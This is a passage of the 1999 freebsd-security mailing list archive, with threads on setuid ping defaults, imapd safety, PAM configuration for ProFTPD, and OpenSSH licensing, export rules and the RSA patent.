-0800 (PST) (envelope-from cjc@cc942873-a.ewndsr1.nj.home.com) Received: (from cjc@localhost) by cc942873-a.ewndsr1.nj.home.com (8.9.3/8.9.3) id XAA03496; Mon, 1 Nov 1999 23:49:57 -0500 (EST) (envelope-from cjc) From: "Crist J. Clark" Message-Id: <199911020449.XAA03496@cc942873-a.ewndsr1.nj.home.com> Subject: Re: Examining FBSD set[ug]ids and their use In-Reply-To: <14365.48408.87230.710344@anarcat.dyndns.org> from Spidey at "Nov 1, 1999 11:17:28 am" To: beaupran@iro.umontreal.ca (Spidey) Date: Mon, 1 Nov 1999 23:49:57 -0500 (EST) Cc: peter.jeremy@alcatel.com.au, freebsd-security@FreeBSD.ORG Reply-To: cjclark@home.com X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Spidey wrote, > > ># Allow users to bind on a socket (which? where?) > > > ping mode=4555 > > Needed to allow ordinary mortals to sent raw IP (ICMP) packets. > > I don't think this should be enable by default... on a shell box, this > could cause some pretty dense headaches... You don't think mortal users should be able to ping? IMHO, ping is a _very_ basic utility that generally should be turned on. I don't want to have to 'su' to root everytime I want to ping a host to see if it is awake. Same goes for traceroute(8). If you want to turn off the setuid (in which case you might as well chmod to 700 as well), you can, but I really don't see it as the default setup. -- Crist J. Clark cjclark@home.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 1 21:25:26 1999 Delivered-To: freebsd-security@freebsd.org Received: from rip.psg.com (rip.psg.com [147.28.0.39]) by hub.freebsd.org (Postfix) with ESMTP id D647915120 for ; Mon, 1 Nov 1999 21:25:04 -0800 (PST) (envelope-from randy@psg.com) Received: from randy by rip.psg.com with local (Exim 3.03 #1) id 11iWRL-0004dc-00 for freebsd-security@freebsd.org; Mon, 01 Nov 1999 21:25:03 -0800 From: Randy Bush MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: freebsd-security@freebsd.org Subject: imap Message-Id: Date: Mon, 01 Nov 1999 21:25:03 -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org i know there have been security issues with imapd. but the current ports version is from december and there's not a lot of help when searching the archive of this mailing list. should i install this puppy, and if so, with what precautions? randy To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 1 22:14:12 1999 Delivered-To: freebsd-security@freebsd.org Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by hub.freebsd.org (Postfix) with ESMTP id A56AD14F35; Mon, 1 Nov 1999 22:14:02 -0800 (PST) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.3/8.9.2) with ESMTP id HAA23976; Tue, 2 Nov 1999 07:13:16 +0100 (CET) (envelope-from phk@critter.freebsd.dk) To: "Jordan K. Hubbard" Cc: Kris Kennaway , security@FreeBSD.ORG, ports@FreeBSD.ORG Subject: Re: OpenSSH patches In-reply-to: Your message of "Mon, 01 Nov 1999 15:13:33 PST." <4789.941498013@localhost> Date: Tue, 02 Nov 1999 07:13:16 +0100 Message-ID: <23974.941523196@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <4789.941498013@localhost>, "Jordan K. Hubbard" writes: >In today's environment, ssh is far more useful than telnet or rlogin, >yet we bundle both. But if we cannot put it on the CD anyway, what is the point of using the weaker OpenSSH rather than "the real thing" ? -- Poul-Henning Kamp FreeBSD coreteam member phk@FreeBSD.ORG "Real hackers run -current on their laptop." FreeBSD -- It will take a long time before progress goes too far! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 1 22:14:37 1999 Delivered-To: freebsd-security@freebsd.org Received: from s8-37-26.student.washington.edu (S8-37-26.student.washington.edu [128.208.37.26]) by hub.freebsd.org (Postfix) with ESMTP id 859AA153D9 for ; Mon, 1 Nov 1999 22:14:29 -0800 (PST) (envelope-from jcwells@u.washington.edu) Received: from localhost (jcw@localhost) by s8-37-26.student.washington.edu (8.9.3/8.9.3) with ESMTP id LAA02758; Tue, 2 Nov 1999 11:07:03 GMT (envelope-from jcwells@u.washington.edu) X-Authentication-Warning: s8-37-26.student.washington.edu: jcw owned process doing -bs Date: Tue, 2 Nov 1999 11:07:03 +0000 (GMT) From: "Jason C. Wells" X-Sender: jcw@s8-37-26.student.washington.edu Reply-To: "Jason C. Wells" To: cjclark@home.com Cc: Spidey , peter.jeremy@alcatel.com.au, freebsd-security@FreeBSD.ORG Subject: Re: Examining FBSD set[ug]ids and their use In-Reply-To: <199911020449.XAA03496@cc942873-a.ewndsr1.nj.home.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 1 Nov 1999, Crist J. Clark wrote: >> > ># Allow users to bind on a socket (which? where?) >> > > ping mode=4555 >> > Needed to allow ordinary mortals to sent raw IP (ICMP) packets. >> >> I don't think this should be enable by default... on a shell box, this >> could cause some pretty dense headaches... > >You don't think mortal users should be able to ping? IMHO, ping is a >_very_ basic utility that generally should be turned on. I don't want >to have to 'su' to root everytime I want to ping a host to see if it >is awake. Same goes for traceroute(8). Doesn't ICMP_BAND_LIMIT reduce said headaches for packets originating from the server? If it did, this would reduce said headaches. This is a question more than a comment. Thank You, | http://students.washington.edu/jcwells/ Jason Wells To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 1 22:16: 9 1999 Delivered-To: freebsd-security@freebsd.org Received: from zippy.cdrom.com (zippy.cdrom.com [204.216.27.228]) by hub.freebsd.org (Postfix) with ESMTP id 31B5915363; Mon, 1 Nov 1999 22:16:03 -0800 (PST) (envelope-from jkh@zippy.cdrom.com) Received: from localhost (localhost [127.0.0.1]) by zippy.cdrom.com (8.9.3/8.9.3) with ESMTP id WAA06833; Mon, 1 Nov 1999 22:15:49 -0800 (PST) (envelope-from jkh@zippy.cdrom.com) To: Poul-Henning Kamp Cc: "Jordan K. Hubbard" , Kris Kennaway , security@FreeBSD.ORG, ports@FreeBSD.ORG Subject: Re: OpenSSH patches In-reply-to: Your message of "Tue, 02 Nov 1999 07:13:16 +0100." <23974.941523196@critter.freebsd.dk> Date: Mon, 01 Nov 1999 22:15:49 -0800 Message-ID: <6829.941523349@localhost> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > But if we cannot put it on the CD anyway, what is the point of using > the weaker OpenSSH rather than "the real thing" ? I'm not all that sure we cannot put it on the CD. :) - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 1 22:20:46 1999 Delivered-To: freebsd-security@freebsd.org Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by hub.freebsd.org (Postfix) with ESMTP id 8FE991524B; Mon, 1 Nov 1999 22:20:34 -0800 (PST) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.3/8.9.2) with ESMTP id HAA24195; Tue, 2 Nov 1999 07:19:50 +0100 (CET) (envelope-from phk@critter.freebsd.dk) To: "Jordan K. Hubbard" Cc: Kris Kennaway , security@FreeBSD.ORG, ports@FreeBSD.ORG Subject: Re: OpenSSH patches In-reply-to: Your message of "Mon, 01 Nov 1999 22:15:49 PST." <6829.941523349@localhost> Date: Tue, 02 Nov 1999 07:19:50 +0100 Message-ID: <24193.941523590@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <6829.941523349@localhost>, "Jordan K. Hubbard" writes: >> But if we cannot put it on the CD anyway, what is the point of using >> the weaker OpenSSH rather than "the real thing" ? > >I'm not all that sure we cannot put it on the CD. :) Well, that is really the deciding point I think. So can you get a definite answer ? -- Poul-Henning Kamp FreeBSD coreteam member phk@FreeBSD.ORG "Real hackers run -current on their laptop." FreeBSD -- It will take a long time before progress goes too far! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 1 22:22:12 1999 Delivered-To: freebsd-security@freebsd.org Received: from zippy.cdrom.com (zippy.cdrom.com [204.216.27.228]) by hub.freebsd.org (Postfix) with ESMTP id B64851533C; Mon, 1 Nov 1999 22:22:07 -0800 (PST) (envelope-from jkh@zippy.cdrom.com) Received: from localhost (localhost [127.0.0.1]) by zippy.cdrom.com (8.9.3/8.9.3) with ESMTP id WAA06895; Mon, 1 Nov 1999 22:21:52 -0800 (PST) (envelope-from jkh@zippy.cdrom.com) To: Poul-Henning Kamp Cc: "Jordan K. Hubbard" , Kris Kennaway , security@FreeBSD.ORG, ports@FreeBSD.ORG Subject: Re: OpenSSH patches In-reply-to: Your message of "Tue, 02 Nov 1999 07:19:50 +0100." <24193.941523590@critter.freebsd.dk> Date: Mon, 01 Nov 1999 22:21:52 -0800 Message-ID: <6891.941523712@localhost> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Well, that is really the deciding point I think. So can you get a > definite answer ? Yes, I'll work on this. Having ssh bundled into FreeBSD is pretty important to me. - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 2 0:22: 1 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.rdc3.on.home.com (ha1.rdc3.on.home.com [24.2.9.68]) by hub.freebsd.org (Postfix) with ESMTP id B26D014CD0 for ; Tue, 2 Nov 1999 00:21:43 -0800 (PST) (envelope-from pccb@yahoo.com) Received: from yahoo.com ([24.114.52.208]) by mail.rdc3.on.home.com (InterMail v4.01.01.02 201-229-111-106) with ESMTP id <19991102081951.DGOE24158.mail.rdc3.on.home.com@yahoo.com> for ; Tue, 2 Nov 1999 00:19:51 -0800 Message-ID: <381E9F12.3E5EA033@yahoo.com> Date: Tue, 02 Nov 1999 03:21:38 -0500 From: Pierre Chiu Reply-To: pccb@yahoo.com Organization: ObjTech Corporation X-Mailer: Mozilla 4.61 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: RE: Pam and Proftpd Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I knew version 1.2.0.pre6 or earlier has this problem. Once I upgrade to pre8, it works for me. Check out the proftpd mailing list for more information. >hello all. > >i resently started messing with Proftpd. in tring to get everything up and >running im running into some PAM problems. as per the readme and info from >the mailing list i''ve added the following to my /etc/pam.conf file >ftp auth required pam_unix.so try_first_pass >ftp account required pam_unix.so try_first_pass >ftp session required pam_unix.so try_first_pass >on tring to log into the running proftpd syslog returns the following >errors. >proftpd[29847]: unable to resolve symbol: pam_sm_open_session >proftpd[29847]: unable to resolve symbol: pam_sm_close_session >proftpd[29847]: PAM(chrisj): Authentication failure To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 2 0:27: 4 1999 Delivered-To: freebsd-security@freebsd.org Received: from telkom32.telkom.co.za (QTTS-NFS-2313.telkom.co.za [165.143.128.102]) by hub.freebsd.org (Postfix) with SMTP id C79DE14DF1 for ; Tue, 2 Nov 1999 00:26:47 -0800 (PST) (envelope-from TshisiL@telkom32.telkom.co.za) Received: from Telkom-Message_Server by telkom32.telkom.co.za with Novell_GroupWise; Tue, 02 Nov 1999 09:59:35 +0200 Message-Id: X-Mailer: Novell GroupWise 5.5.2 Date: Tue, 02 Nov 1999 09:53:08 +0200 From: "Livhu Tshisikule" To: Subject: Perl reference guide... Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Disposition: inline Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, Can someone point me to a site where I can get perl reference guide in html format Thanks Livhu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 2 1:42:55 1999 Delivered-To: freebsd-security@freebsd.org Received: from axl.noc.iafrica.com (axl.noc.iafrica.com [196.31.1.175]) by hub.freebsd.org (Postfix) with ESMTP id B55B914DB3 for ; Tue, 2 Nov 1999 01:42:40 -0800 (PST) (envelope-from sheldonh@axl.noc.iafrica.com) Received: from sheldonh (helo=axl.noc.iafrica.com) by axl.noc.iafrica.com with local-esmtp (Exim 3.040 #1) id 11iaSV-00019s-00; Tue, 02 Nov 1999 11:42:31 +0200 From: Sheldon Hearn To: Randy Bush Cc: security@freebsd.org Subject: Re: imap In-reply-to: Your message of "Mon, 01 Nov 1999 21:25:03 PST." Date: Tue, 02 Nov 1999 11:42:31 +0200 Message-ID: <4455.941535751@axl.noc.iafrica.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 01 Nov 1999 21:25:03 PST, Randy Bush wrote: > i know there have been security issues with imapd. Could you tell me where I can find out about these? I checked what I think is the imap-uw web page at http://www.washington.edu/imap/ The last security advisory listed on that page is from July 1998 and the RELNOTES distributed with imap-4.6.tar.Z don't mention any security-related fixes over the version in the ports tree, namely 4.5. Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 2 1:53:32 1999 Delivered-To: freebsd-security@freebsd.org Received: from bg.sics.se (bg.sics.se [193.10.66.124]) by hub.freebsd.org (Postfix) with ESMTP id 2087C1539F; Tue, 2 Nov 1999 01:53:02 -0800 (PST) (envelope-from bg@bg.sics.se) Received: (from bg@localhost) by bg.sics.se (8.9.3/8.9.3) id KAA00417; Tue, 2 Nov 1999 10:53:34 +0100 (CET) (envelope-from bg) To: Robert Watson Cc: Kris Kennaway , Issei Suzuki , security@FreeBSD.ORG, ports@FreeBSD.ORG Subject: Re: OpenSSH patches References: From: Bjoern Groenvall Date: 02 Nov 1999 10:53:33 +0100 In-Reply-To: Robert Watson's message of Mon, 1 Nov 1999 22:25:47 -0500 (EST) Message-ID: Lines: 25 X-Mailer: Red Gnus v0.52/Emacs 19.34 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Robert Watson writes: > What is the export deal on ebones/Kerberos? Ebones is exportable, but I > don't remember a) whether it had to be reviewed/approved, and b) whether > or not it actually had direct crypto hooks. The "hooks" in Bones where rather innocent looking calls to bzero and bcopy. It was necessary to inspect every bzero/bcopy call before putting the calls to DES back. Eric Young put the DES calls back and changed the name to eBones. To the best of my knowledge MIT did not have Bones reviewed/approved for export (and it was probably not necessary either). Many years later somebody at Cygnus got an approval that it was ok to export the Ebones sources. /Björn -- _ _ ,_______________. Bjorn Gronvall (Björn Grönvall) /_______________/| Swedish Institute of Computer Science | || PO Box 1263, S-164 29 Kista, Sweden | Schroedingers || Email: bg@sics.se, Phone +46 -8 633 15 25 | Cat |/ Cellular +46 -70 768 06 35, Fax +46 -8 751 72 30 `---------------' To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 2 1:53:48 1999 Delivered-To: freebsd-security@freebsd.org Received: from smtp.interact.se (smtp1.interact.se [193.15.98.9]) by hub.freebsd.org (Postfix) with ESMTP id 3F818153DF for ; Tue, 2 Nov 1999 01:53:36 -0800 (PST) (envelope-from je@interact.se) Received: from wolfie.interact.se (wolfie.interact.se [193.15.98.202]) by smtp.interact.se (InterACT Mailer) with ESMTP id KAA20375; Tue, 2 Nov 1999 10:54:12 +0100 (CET) Date: Tue, 2 Nov 1999 10:53:09 +0100 (CET) From: Jonas Eriksson To: Livhu Tshisikule Cc: freebsd-security@FreeBSD.ORG Subject: Re: Perl reference guide... In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=ISO-8859-1 Content-Transfer-Encoding: QUOTED-PRINTABLE Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Check: http://www.perldoc.org/ http://www.perl.com/CPAN-local/ And for cgi security=20 http://www.w3.org/Security/Faq/www-security-faq.html Regards Jonas Eriksson -- InterACT Lule=E5 Network & Security Administrator Tel: +46 (0)920 88803 - Fax: +46 (0)920 88399 Current temp in Lulea/Sweden is 6.7C (44.1F) On Tue, 2 Nov 1999, Livhu Tshisikule wrote: > Hi, >=20 > Can someone point me to a site where I can get perl reference guide in > html format >=20 > Thanks > Livhu >=20 >=20 > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message >=20 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 2 2:17:53 1999 Delivered-To: freebsd-security@freebsd.org Received: from not.demophon.com (ns.demophon.com [193.65.70.13]) by hub.freebsd.org (Postfix) with ESMTP id 2F0A6152F2; Tue, 2 Nov 1999 02:17:36 -0800 (PST) (envelope-from will@not.demophon.com) Received: (from will@localhost) by not.demophon.com (8.9.3/8.8.7) id MAA01635; Tue, 2 Nov 1999 12:16:27 +0200 (EET) (envelope-from will) To: Poul-Henning Kamp Cc: jkh@zippy.cdrom.com, kris@hub.freebsd.org, security@freebsd.org, ports@freebsd.ort Subject: Re: OpenSSH patches References: <23974.941523196@critter.freebsd.dk.newsgate.clinet.fi> From: Ville-Pertti Keinonen Date: 02 Nov 1999 12:16:27 +0200 In-Reply-To: Poul-Henning Kamp's message of "2 Nov 1999 08:14:26 +0200" Message-ID: <861za95hc4.fsf@not.demophon.com> Lines: 23 X-Mailer: Gnus v5.5/XEmacs 20.4 - "Emerald" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Poul-Henning Kamp writes: > In message <4789.941498013@localhost>, "Jordan K. Hubbard" writes: > > >In today's environment, ssh is far more useful than telnet or rlogin, > >yet we bundle both. > > But if we cannot put it on the CD anyway, what is the point of using > the weaker OpenSSH rather than "the real thing" ? The latest versions of the real thing have license restrictions. Versions 1.2.x where x > 15 (IIRC) have a restriction prohibiting commercial use with no definition of what "commercial use" is. ssh2 also has this restriction, with a *very* strict definition of commercial use... BTW: Why is OpenSSH "weaker"? I haven't looked at it, but the primary changes that have occurred between 1.2.15 and 1.2.>20 are bug fixes and a couple of minor protocol changes, which I understood have been incorporated into OpenSSH (as long as the changes aren't copied verbatim from later "official" versions, there should be no copyright issues). To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 2 4:50:14 1999 Delivered-To: freebsd-security@freebsd.org Received: from acssun.pstcc.cc.tn.us (ACSSUN.PSTCC.CC.TN.US [198.146.192.84]) by hub.freebsd.org (Postfix) with ESMTP id 5D1D714DFC; Tue, 2 Nov 1999 04:50:02 -0800 (PST) (envelope-from hcking@acssun.pstcc.cc.tn.us) Received: from localhost (hcking@localhost) by acssun.pstcc.cc.tn.us (8.8.8/8.6.9) with SMTP id HAA21248; Tue, 2 Nov 1999 07:49:59 -0500 (EST) Date: Tue, 2 Nov 1999 07:49:59 -0500 (EST) From: hal X-Sender: hcking@acssun To: security@FreeBSD.ORG Cc: ports@FreeBSD.ORG Subject: Re: OpenSSH patches In-Reply-To: <24193.941523590@critter.freebsd.dk> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 2 Nov 1999, Poul-Henning Kamp wrote: > In message <6829.941523349@localhost>, "Jordan K. Hubbard" writes: > >> But if we cannot put it on the CD anyway, what is the point of using > >> the weaker OpenSSH rather than "the real thing" ? > > > >I'm not all that sure we cannot put it on the CD. :) > > Well, that is really the deciding point I think. So can you get a > definite answer ? > Well I'm sure this has been brought up before, but could we not find sites *ssh and create scripts to install them with user interaction. I would be very surprised if one of the ssh'es were not available outside the US restriction zones. This could apply to PGP too. We know where pgpi is located. Wget and sh would do the job with minimal additions to the necessary load tree (small is good). I know not everyone has access to the net, but such a solution could be added _now_ while an exportable way to include all needed files on the CD is found. Just a thought. hal hcking@acssun.pstcc.cc.tn.us Coca-Cola in China was first read "Ke-kou-ke-la" meaning "Bite the wax tadpole" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 2 6:38:21 1999 Delivered-To: freebsd-security@freebsd.org Received: from india.citi.umich.edu (india.citi.umich.edu [141.211.92.147]) by hub.freebsd.org (Postfix) with ESMTP id E921A15139 for ; Tue, 2 Nov 1999 06:38:04 -0800 (PST) (envelope-from provos@citi.umich.edu) Received: from citi.umich.edu (IDENT:provos@india.citi.umich.edu [141.211.92.147]) by india.citi.umich.edu (8.9.3/8.9.3) with ESMTP id JAA27155; Tue, 2 Nov 1999 09:37:47 -0500 (EST) Message-Id: <199911021437.JAA27155@india.citi.umich.edu> Subject: Re: OpenSSH patches From: Niels Provos In-Reply-To: Issei Suzuki, Tue, 02 Nov 1999 06:57:58 +0900 To: Issei Suzuki Cc: security@freebsd.org Date: Tue, 02 Nov 1999 09:37:47 -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <19991102065758V.issei@issei.org>, Issei Suzuki writes: > It does not seem that OpenSSH source code includes any kind of >crypto argorythm (they are included in OpenSSL library), but is it >still affected by US crypto restrictions? We tried very hard to remove all crypto algorithms from the OpenSSH sources themselves. Eseentially only the protocol is left. OpenSSH has about 20K lines of source, compared to the 70K in ssh-1.2.27. This allows for easier code audit, and also easier to touch for people in the USA. Greetings, Niels. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 2 6:46:39 1999 Delivered-To: freebsd-security@freebsd.org Received: from india.citi.umich.edu (india.citi.umich.edu [141.211.92.147]) by hub.freebsd.org (Postfix) with ESMTP id 0689615139; Tue, 2 Nov 1999 06:46:32 -0800 (PST) (envelope-from provos@citi.umich.edu) Received: from citi.umich.edu (IDENT:provos@india.citi.umich.edu [141.211.92.147]) by india.citi.umich.edu (8.9.3/8.9.3) with ESMTP id JAA27912; Tue, 2 Nov 1999 09:46:00 -0500 (EST) Message-Id: <199911021446.JAA27912@india.citi.umich.edu> Subject: Re: OpenSSH patches From: Niels Provos In-Reply-To: Poul-Henning Kamp, Tue, 02 Nov 1999 07:13:16 +0100 To: Poul-Henning Kamp Cc: "Jordan K. Hubbard" , Kris Kennaway , security@FreeBSD.ORG, ports@FreeBSD.ORG, markus@openbsd.org, dugsong@openbsd.org Date: Tue, 02 Nov 1999 09:46:00 -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <23974.941523196@critter.freebsd.dk>, Poul-Henning Kamp writes: >But if we cannot put it on the CD anyway, what is the point of using >the weaker OpenSSH rather than "the real thing" ? Why is it weaker? And what are the differences? OpenSSH talks protocol 1.5 including X11 + agent forwarding. If you had tracked bugtraq recently, you would have noticed that there was an attack that applied to normal ssh but not to OpenSSH. Actually, OpenSSH has many benefits over normal ssh. One of them, already convincing enough by itself, is the free commercial use. Greetings, Niels. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 2 7:57:40 1999 Delivered-To: freebsd-security@freebsd.org Received: from funky.monkey.org (funky.monkey.org [63.77.239.12]) by hub.freebsd.org (Postfix) with ESMTP id 8497B14D5B; Tue, 2 Nov 1999 07:57:16 -0800 (PST) (envelope-from dugsong@monkey.org) Received: by funky.monkey.org (Postfix, from userid 1001) id 57AB215189; Tue, 2 Nov 1999 10:51:44 -0500 (EST) Received: from localhost (localhost [127.0.0.1]) by funky.monkey.org (Postfix) with ESMTP id 20FE314A01; Tue, 2 Nov 1999 10:51:43 -0500 (EST) Date: Tue, 2 Nov 1999 10:51:43 -0500 (EST) From: Dug Song To: Niels Provos Cc: security@FreeBSD.ORG, ports@FreeBSD.ORG, markus@openbsd.org Subject: Re: OpenSSH patches In-Reply-To: <199911021446.JAA27912@india.citi.umich.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 2 Nov 1999, Niels Provos wrote: > One of them, already convincing enough by itself, is the free > commercial use. not within the US, though. :-( OpenBSD's OpenSSL relies on the system libcrypto, which uses a different RSA implementation depending on which ssl26 package you've installed. for US users, this is RSAREF (RSA's reference implementation), which is only available for NON-commercial use. in order to use RSAREF (or indeed, any implementation of RSA) commercially, you must buy an RSA license. there is no way around this. any other use of the RSA algorithm within the US is in violation of the RSA patent (though few people seem to care about this in practice - how many illegal SSH installations are out there?). all software that uses RSA is subject to this bogosity, including PGP: http://bs.mit.edu:8001/pgp-form.html http://www.scramdisk.clara.net/pgpfaq.html#SubRSAREF -d. --- http://www.monkey.org/~dugsong/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 2 8:27:23 1999 Delivered-To: freebsd-security@freebsd.org Received: from india.citi.umich.edu (india.citi.umich.edu [141.211.92.147]) by hub.freebsd.org (Postfix) with ESMTP id 0C70615633; Tue, 2 Nov 1999 08:27:06 -0800 (PST) (envelope-from provos@citi.umich.edu) Received: from citi.umich.edu (IDENT:provos@india.citi.umich.edu [141.211.92.147]) by india.citi.umich.edu (8.9.3/8.9.3) with ESMTP id LAA16383; Tue, 2 Nov 1999 11:27:04 -0500 (EST) Message-Id: <199911021627.LAA16383@india.citi.umich.edu> Subject: Re: OpenSSH patches From: Niels Provos In-Reply-To: Dug Song, Tue, 02 Nov 1999 10:51:43 EST To: Dug Song Cc: security@FreeBSD.ORG, ports@FreeBSD.ORG, markus@openbsd.org Date: Tue, 02 Nov 1999 11:27:04 -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message , Dug Song writes: >On Tue, 2 Nov 1999, Niels Provos wrote: >> One of them, already convincing enough by itself, is the free >> commercial use. >not within the US, though. :-( I was actually refering to the fact, that the OpenSSH sources are not covered by a restrictive license. Whereas ssh-1.2.27 does not allow commerical use without a license from Data Fellows. Greetings, Niels. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 2 9:49:44 1999 Delivered-To: freebsd-security@freebsd.org Received: from tao.thought.org (tao.tera.com [207.108.223.55]) by hub.freebsd.org (Postfix) with ESMTP id 181F714CB6; Tue, 2 Nov 1999 09:49:24 -0800 (PST) (envelope-from kline@tao.thought.org) Received: (from kline@localhost) by tao.thought.org (8.8.8/8.7.3) id JAA10864; Tue, 2 Nov 1999 09:49:01 -0800 (PST) From: "Gary D. Kline" Message-Id: <199911021749.JAA10864@tao.thought.org> Subject: Re: OpenSSH patches In-Reply-To: from Dug Song at "Nov 2, 99 10:51:43 am" To: dugsong@monkey.org (Dug Song) Date: Tue, 2 Nov 1999 09:49:01 -0800 (PST) Cc: provos@citi.umich.edu, security@FreeBSD.ORG, ports@FreeBSD.ORG, markus@openbsd.org Organization: <> thought.org: public service Unix since 1986... <> X-Mailer: ELM [version 2.4ME+ PL32 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org According to Dug Song: > On Tue, 2 Nov 1999, Niels Provos wrote: > > > One of them, already convincing enough by itself, is the free > > commercial use. > > not within the US, though. :-( > > OpenBSD's OpenSSL relies on the system libcrypto, which uses a different > RSA implementation depending on which ssl26 package you've installed. > > for US users, this is RSAREF (RSA's reference implementation), which is > only available for NON-commercial use. in order to use RSAREF (or indeed, > any implementation of RSA) commercially, you must buy an RSA license. > there is no way around this. > > any other use of the RSA algorithm within the US is in violation of the > RSA patent (though few people seem to care about this in practice - how > many illegal SSH installations are out there?). > > all software that uses RSA is subject to this bogosity, including PGP: > > http://bs.mit.edu:8001/pgp-form.html > http://www.scramdisk.clara.net/pgpfaq.html#SubRSAREF > Anybody know how much longer the RSA patent hold? Seems to me it runs out in the next few years. gary -- Gary D. Kline kline@tao.thought.org Public service Unix To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 2 10: 7:13 1999 Delivered-To: freebsd-security@freebsd.org Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2]) by hub.freebsd.org (Postfix) with ESMTP id 4503C14F1D; Tue, 2 Nov 1999 10:06:48 -0800 (PST) (envelope-from jwyatt@rwsystems.net) Received: from bsdie.rwsystems.net([209.197.223.2]) (1952 bytes) by bsdie.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Tue, 2 Nov 1999 12:00:19 -0600 (CST) (Smail-3.2.0.106 1999-Mar-31 #1 built 